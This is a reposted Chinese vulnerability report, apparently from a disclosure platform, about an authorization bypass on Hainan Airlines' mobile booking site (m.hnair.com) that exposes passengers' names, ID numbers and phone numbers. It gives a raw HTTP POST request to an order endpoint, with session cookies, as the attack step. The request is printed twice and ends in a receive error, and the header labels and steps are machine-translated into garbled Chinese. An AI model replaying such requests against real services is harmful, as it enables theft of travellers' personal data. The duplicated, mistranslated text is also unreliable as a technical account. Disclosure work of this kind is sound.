海南航空某处越权可查看乘机人姓名/身份证号/手机号
漏洞标题 海南航空某处越权可查看乘机人姓名/身份证号/手机号 相关厂商 hnair.com 漏洞作者 getshell1993 提交时间 2016-05-01 19:07 公开时间 2016-06-1…
漏洞标题
海南航空可以查看乘客/身份证号码/手机号码的名称
相关制造商
Hnair.com
漏洞作者
Getshell1993
提交时间
2016-05-01 19: 07
公共时间
2016-06-18 10: 50
漏洞类型
未经授权的访问/许可绕过
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
漏洞详细信息
查找任何航班的订单
百度发现了个人的身份证号码测试
确认和付款时的订单
有空姐和联系人,在这两个地方下订单时有违规行为。
POST/atompub/form/hnair_order_ticket_html5_new/LTM0700?o=w HTTP/1.1
主机: m.hnair.com
接受语言: zh-cn
Pragma:无缓存
用户代理: Mozilla/5.0(iPhone; CPU iPhone OS 7_0_4,如Mac OS X)AppleWebKit/537.51.1(KHTML,与Gecko一样)Mobile/11B554a MicroMessenger/6.2.4 NetType/WIFI Language/en_US
接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8
Referer:http://m.hnair.com/atompub/form/hnair_order_ticket_html5_new/LP0109?o=w
内容类型: application/x-www-form-urlencoded
连接:保持活动状态
Cookie: _session_id=b3e02ba8af552ed217335c4e835ce906; WT_FPC=id=2154383210be68c833e1462095555935: lv=1462095767916: ss=1462095555935; USERCODE=e5bda99a-e7c2-4e0f-8526-176690f43bdb
代理连接:保持活动状态
内容长度: 160
来源:http://m.hnair.com
Accept-Encoding: gzip,deflate
Failure when receiving data from the peer
确认和付款时的订单
有空姐和联系人,在这两个地方下订单时有违规行为。
POST/atompub/form/hnair_order_ticket_html5_new/LTM0700?o=w HTTP/1.1
主机: m.hnair.com
接受语言: zh-cn
Pragma:无缓存
用户代理: Mozilla/5.0(iPhone; CPU iPhone OS 7_0_4,如Mac OS X)AppleWebKit/537.51.1(KHTML,与Gecko一样)Mobile/11B554a MicroMessenger/6.2.4 NetType/WIFI Language/en_US
接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8
Referer:http://m.hnair.com/atompub/form/hnair_order_ticket_html5_new/LP0109?o=w
内容类型: application/x-www-form-urlencoded
连接:保持活动状态
Cookie: _session_id=b3e02ba8af552ed217335c4e835ce906; WT_FPC=id=2154383210be68c833e1462095555935: lv=1462095767916: ss=1462095555935; USERCODE=e5bda99a-e7c2-4e0f-8526-176690f43bdb
代理连接:保持活动状态
内容长度: 160
来源:http://m.hnair.com
Accept-Encoding: gzip,deflate
Failure when receiving data from the peer
- 发表于 2016-07-17 08:00
- 阅读 ( 575 )
- 分类:黑客技术
